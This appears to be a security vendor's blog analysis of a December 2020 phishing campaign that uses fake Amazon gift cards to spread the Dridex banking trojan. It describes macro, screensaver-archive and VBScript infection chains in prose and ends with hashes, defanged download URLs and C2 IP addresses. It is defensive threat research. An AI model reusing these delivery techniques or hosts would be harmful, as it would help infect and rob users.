Amazon Gift Card Offer Serves Up Dridex Banking Trojan

Over the course of December, 2020, the Cybereason Nocturnus Team has been tracking down cyber crime campaigns related to the holiday season, and more specifically to online shopping. 2020, from obvious reasons, is a year where consumers changed their shopping habits towards doing most of their shopping online. 

Consumers have long been a favored target for cybercriminals, and the sharply increased volume of online shopping spurred by the COVID-19 pandemic have made consumer-focused attacks potentially even more attractive. According to data from the recent IBM U.S. Retail Index released in August of this year, “the pandemic has accelerated the shift away from physical stores to digital shopping by roughly five years,” and “e-commerce is projected to grow by nearly 20% in 2020.” 

Cyber criminals are tracking on these trends and leveraging them for financial gain. One recent campaign that caught the eye uses a fake Amazon gift card scam to deliver the Dridex banking trojan.

Key Findings

Threat actors leverage the Holidays Season: Targeting users of one of the most popular shopping platforms, Amazon, as online shopping volume continues to trend upwards.

Most targets are from US and Western European countries: The vast majority of the victims appear to be located in the US and Western-Europe, where Amazon is very popular and has local websites.

Social engineering: The campaign uses legitimate looking emails, icons and naming conventions to lure victims into downloading the malicious attachments.

Different infection methods: There are three different methods one can get infected by: SCR files, a malicious document, and a VBScript.

Multi-staged: Each of the infection mechanisms contain more than one stage, either unarchiving a password protected archive containing different file types or running PowerShell commands to connect to the C2.

Final payload with severe consequences: The final payload being the notorious Dridex banking trojan, the victim is exposed to further banking data exfiltration.

Background

Dridex is one of the most notorious and prolific banking trojans that has been active in different variants since at least 2012, its previous reincarnation being Feodo (AKA Cridex, Bugat). It is considered to be an evasive malware that steals e-banking credentials and other sensitive information, with a resilient infrastructure of command and control (C2) servers, acting as backups for one another, so in case one of them is down the next in line is connected, allowing Dridex to exfiltrate stolen data. 

Dridex is most commonly delivered via phishing emails containing Microsoft Office documents, weaponized with malicious macros. Dridex is also being constantly updated with new features such as anti-analysis. Dridex is largely operated by Evil Corp, one of the most prosperous cybercrime groups has been operating for over a decade.  One of its most known affiliates is the TA505, a financially motivated cybercrime group that has been distributing Dridex since 2014. In addition, TA505 is known to use other malware like SDBOT, Servhelper,  and FlawedAmmyy as well as the CLOP ransomware.

The current campaign that targets consumers who are falsely informed they have received an Amazon gift card and infects the target with three similar yet unique techniques; similar in terms of luring the victim into clicking the file, and different in terms of the execution flow:

• Word document that contains a malicious macro

• Self-extracting SCR file, a known technique used by Dridex

VBScript file attached to the email, another known technique used by Dridex


Dridex-Blog-1

Amazon phishing email. Credit: @JAMESWT_MHT

After the user downloads the prompted file, they are redirected to Amazon legitimate webpage, thus gaining more credibility with the victim.

Infection Vector and Campaign Analysis

The first infection vector this campaign is exploiting is an email purporting to be from Amazon offering a free gift card. The email prompts the user to download a gift card which actually leads to infection by way of three different methods.

First Delivery Method: Documents with Malicious Macros

The first delivery method is a malicious Word document with some sort of variation of a “Gift Card” in the file name:

Dridex-Blog-2

A list of documents containing the malicious macro

The malicious Word document prompts the victim to click the “Enable Content” button that runs the macro, a common technique used in this sort of attack, because embedded macros are usually disabled by default:

Dridex-Blog-3

Content of the word documents

Once the user enables the content, the following obfuscated VBScript file file is executed:

Dridex-Blog-4

Dridex malicious VBScript file as seen in Virustotal with low detection rate

The macro itself contains an obfuscated base64 encoded PowerShell script:

Dridex-Blog-5

Beginning of the obfuscated and encoded PowerShell script

The PowerShell script is prefixed by a command that opens a pop up with a fake error message, tricking the user into thinking there was an error opening the file, when in fact the macro is being run in the background:

Dridex-Blog-6

Fake error pop up

The Cybereason Defense Platform detects the malicious activity, logs the different attack components together with their command lines, and then automatically decodes the base64 encoded data:

Dridex-Blog-7

 

Dridex-Blog-8

Dridex-Blog-9

Malicious document execution in the Cybereason Defense Platform

Finally, the PowerShell connects to the C2 and drops Dridex.

Second Delivery Method: Screensaver Files

The second delivery method that was used by the attackers involved SCR files. Such files are commonly used by attackers because it allows them to bypass some email filters that are based solely on file extensions, and also allows them to bundle several components together because SCR files are eventually self-executing archives.

The SCR files have very convincing Amazon themed icons and naming conventions. At least four distinctive files were uploaded to VirusTotal:

Dridex-Blog-10

List of the SCR files as seen in Virustotal

One of the SCR files contains a VBScript, an archive (“reedmi.cvl”), a utility to extract it, and a batch file:

Dridex-Blog-11

Contents of the SCR file

The first file executed is “svideo.vbs” which creates a WScript object and runs “elp.bat”:

Dridex-Blog-12

Contents of svideo.vbs

“plp.bat” is a batch file that renames and unarchives the password protected “reedmi.cvl” with the bundled “extraPFZ” executable, runs “chinatown.vbs” that is extracted from “reedmi.cvl” and deletes the itself together with the renamed “reedmi.cvl” and what seems to be the initial dropper whose value the threat actor did not change:

Dridex-Blog-13

Contents of elp.bat

In addition to “chinatown.vbs”, another batch file is dropped from “reedmi.cvl”, and also the Dridex DLL:

Dridex-Blog-14

Content of reedmi.cvl

Once again, the VBS file’s role is solely to run a batch file, this time “7p.bat”:

Dridex-Blog-15

Content of chinatown .vbs

Finally, “7p.bat” creates a hidden folder with system file attributes, then uses “regsvr32” to run the Dridex DLL and terminates the extraPFZ executable from the previous stage, then changes the permissions again for the Dridex DLL and deletes all the rest of the files to remove its traces:

Dridex-Blog-16

Contents of 7p.bat extracted from reedmi.cvl

The Dridex DLL can be seen in Virustotal:

Dridex-Blog-17

Dridex DLL detection in VirusTotal

The whole infection chain described above can be seen in the Cybereason Defense Platform. Each component of the attack is documented, and both the SCR file and regsvr32 that executes Dridex, are detected as malicious:

Dridex-Blog-18

Dridex-Blog-19

Possess tree of the malicious SCR file in the Cybereason Defense Platform

When the Cybereason sensor “Prevention Mode” is enabled, the execution of the Dridex DLL is prevented:

Dridex-Blog-20

Execution prevention of the Dridex DLL by the Cybereason Sensor

Third Delivery Method:  VBScript files

The third infection method is a straightforward VBScript file that is also downloaded via a malicious link in the email body:

Dridex-Blog-21

Gift card VBScript as seen in VirusTotal

This VBScript file is about 2MB in size because of an archive bundled within it.

This archive, named “Norris.zip”, is dropped on the infected machine and contains the Dridex DLL named “Gino.tga”:

Dridex-Blog-22

Contents of the “Norris.zip” archive

Finally, as seen in the SCR version, the Dridex DLL is executed using the regsvr32 process.

Conclusion

Both cybercriminals and nation-state threat actors alike find and exploit trending circumstances in order to leverage a given situation to infect unsuspecting victims, such as  the holiday season, the ongoing COVID-19 pandemic, or both of them combined.

It is also not the first time that an Amazon-related campaign has been used to trick victims into downloading malware. Because of the new reality in a COVID19 world, and even more so this time of the year, launching various campaigns that use known e-commerce vendors as an aspect of the attack vector is really appealing to threat actors, both on mobile and desktop.

Adding to the growing popularity of online shopping and the inherent risks  is the fact that Dridex is known to be takedown resistant to some degree, and the fact that there are many other destructive malware variants out there, the risk of falling into this trap or another using social engineering is quite concerning.

When carrying out such attacks, threat actors spend a great deal of time customizing the themes used to get the attention of an unsuspecting victim. Post-infection, the implementation of the payload deployment on the machine is often multi-staged and highly evasive. This current Dridex campaign introduced three different attack vectors; in case one fails to work perhaps the other will, thus creating a backup mechanism not only for their C2 servers, but also for completing the infection process itself.

Similar themes leveraging gift card giveaways and other offerings are not new in the cybercrime landscape, and will most likely to continue to be applied in the future. It is up to the user to be aware of such campaigns and to apply the relevant counter measures.

MITRE ATT&CK BREAKDOWN

Initial Access

Execution

Persistence

Privilege Escalation

Collection

Command and Control

Phishing

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Process Injection

Man in the Browser

Application Layer Protocol

 

Command and Scripting Interpreter: Windows Command Shell

     

Encrypted Channel

 

Command and Scripting Interpreter: Visual Basic

     

Proxy

         

Remote Access Software

 

Open the chatbot on the lower right-hand side of this blog to download your copy of the Indicator's of Compromise, which includes C2 Domains, IP addresses, Docx files SHA-1 hashes, and Msi files.

 

Daniel Frank 

Daniel Frank

Daniel Frank is a senior Malware Researcher at Cybereason. Prior to Cybereason, Frank was a Malware Researcher in F5 Networks and RSA Security. His core roles as a Malware Researcher include researching emerging threats, reverse-engineering malware and developing security-driven code. Frank has a BSc degree in information systems.

Dridex Banking Trojan | Indicator's of Compromise

 

IOC

SHA-1

SHA-256

Docs

24469cbb07d53b9de7993860a028610cd2c74f1a

861a3fa58726a801827b4a8f0eab4e468edf70d9

817f30717ce3811bde011d8cc55bbfe5354ac832

ee3634a25fd2f0947fbf86b143b90f906658e0c8

4582c6b6eee1151f0e17c54c565afb827d7db46f

2e3283ba63e87b2c4fc1e9acc7791c7f1c1230df

a2b1e3456211f24a727c341079bd2a6b79eacad9

113260e9e781cb36228f3ac403a11398a9c243eb

3d13044973e410e64b9686dfc0e139ffe6c90575

f41a4f7cc9d733fb3a52b3a7f5037eebca312414

567052f0b8b453932db3e18208990bca12bcc167

82cac4b400eda937002583584e92081a66002b88

701e5ee9a935686508511f834bc3a551eae9031e

1e4c849910d35e23fb8f3e67294f3e6ec0630360

8dbd9d1bfe48c59b5704d6275f478e768230c81d

8e0a6fe27090e76ecac36cc7be25de7a551c029a

4c64d69981328dbb70a2726c1709789ab84be40c

cc07421f4e00440ff06d36d8a56235e185158018

43e8989ee42051fb9006d54b639de69ca60e1e07

56811440234742e6b7617685e0dee6a1f4034dfe

da83c6acd96b44c79fa0a46a665db1f45ea5072e18a2534b90eb9e5218cb90d9

62837b5eadab683fcb65146360ff15a477402a9eb482bcb009949025ee378662

85e6b26fb743170eaaaf7d246447e6a1fc31cdd5c00d35bdcedc58344e79b4b9

374e49855da4707961a8d96360a89011d223d4ed7f02d3ca91c43dea305ebf9e

492be6f5d4ffdfad7369eabcf597d836a253c017ed86b88d3273476d745972b3

12154124ac818aba19bcb6359e0e56bf651a8c260c95dbefce8799733799cb45

a7310b2788b45ae9f503664ff2461ef36b8e529552aa4402338a47cc8a698c01

2643154741f0f24158b910372d741a3052c22ec731e7c6c2d56de49d01fb83c8

63be8f8941f30e508a10477f5df18aa84ee80654f2c80bac71438e6d89bcc1fb

19e223b2a021ef29d7672ec440adb4bff88914aa2208a036656befaadfecd391

255327cc966eebcdb52f94414c36920585f2190ae10a9560db5047def717b2ac

20025034054cf145b743dbd080be1ec4a8153f23f42a5f101df3cd51db618df9

fb22724422c3d14ce41129f3964c634c66daa8c5661c2f60def4178cee6738eb

a888a7f5140bad661317264229075089b1c8e1267984b3d495a39a5f5638a419

9ca6330ecc859154893e48bed53317005670c23c5d58bca8e991177cbb7324e9

d4704ca87e4e6072526a67adbf5e5a752172e947a4e6354d962455b4dce37994

cfa0c0bb7e94155fefa426031c9d52ccc43cf3dde56c97f68fb20262ebb7219d

a2e7925524c459515f03addcb576e2d92bcfb658891e470b56be71c22f561d5c

a39fd124cdc1ed93f57f95581a48881b878e42a249a6fbb1da203a03958a5846

e20dadb65651d81743aae5451f4f63d6fd7a7da48d4bf71af247a033ac46ee11

SCRs

a8adc02637c62262e02f0097222cda0cd2aef013

30d948edd1e0b1c7866148d9f6fd559f478958b7

653ab54e15b01473943cd897ded24f742b0193c5

80df010a6db104d6a75177564a543f253cc003c6

ee492eda053d19e082cd88acef8825e8dfd4616d51689e2e9667f5ed9035b1df

df2ed991a6ab65f2bc05805376dcf34de7febc5c5d4b37d400546e4e01d90fc0

2c6110a76dda8da49195052fa561ab8b8278c02df400124e46d26d2df228b70b

4f1c6ff815b087e2d5702485939f6e65deef7eaf72ee27641e6562162b47dae5

VBS from docs

bee5c9252b02824b9025c9b78ce7c5f050638ef5

981b418e83adfc89438ae388a7f15c62e527504827c2d6e68afe3e47f73f4191

Gift Card VBS

6a9315b617088b98c08c8d7aef8be34ffa565ecf

a7cd6b2211f59ee52f25aae90b726f6f07f79a6d5969344353f9c0910b6aaca3

“Norris.zip” archive dropped by the Gift Card VBS

6954c18d37f57bf644bebca0b186442c8af837e7

fe7c88c0e87a53c78750fe381b3993bb8c09b42e973bac9f7b338666a0543943

Dridex payloads

8b71bd0a2618d26a16a85245e7a92aef6d3da967

15bd1122fe1a910c3b8f255bbe74de5ffed57fd2

2daeeb9448614ad10b35b9d4c99ba607ef647f6e

b12b65a39a6261016b7473cfd08c316cee6958739e00bb746331bdfb52b4b0bb

a1658b979357f174c83dcd9867941d8cd917beb3ea67720fa43b6340b27762ba

560478c5532f341407bed4a90de3f7a53bb36d500691f1f41e7d18a44f354f8a

 

URLs

conjurosdeamoryhechiceriaacacio[.]com/tjbdhdvi1.zip

airbornegroup[.]net/y461xrm.zip

burstner.clabris[.]se/ucjk7st.zip

oya[.]qa/lfonl5.rar

cms.keita[.]ae/h0mqrz.rar

keitauniv.keita[.]ae/wchfvdsd7.rar

bespokeweddings[.]ie/k1c8dh4.rar

phones.pmrspain[.]com/xzeoxn8.rar

Dridex C2

194.225.58[.]216

198.57.200[.]100

178.254.40[.]132

216.172.165[.]70

Cybereason Nocturnus
About the Author

Cybereason Nocturnus

The Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.

All Posts by Cybereason Nocturnus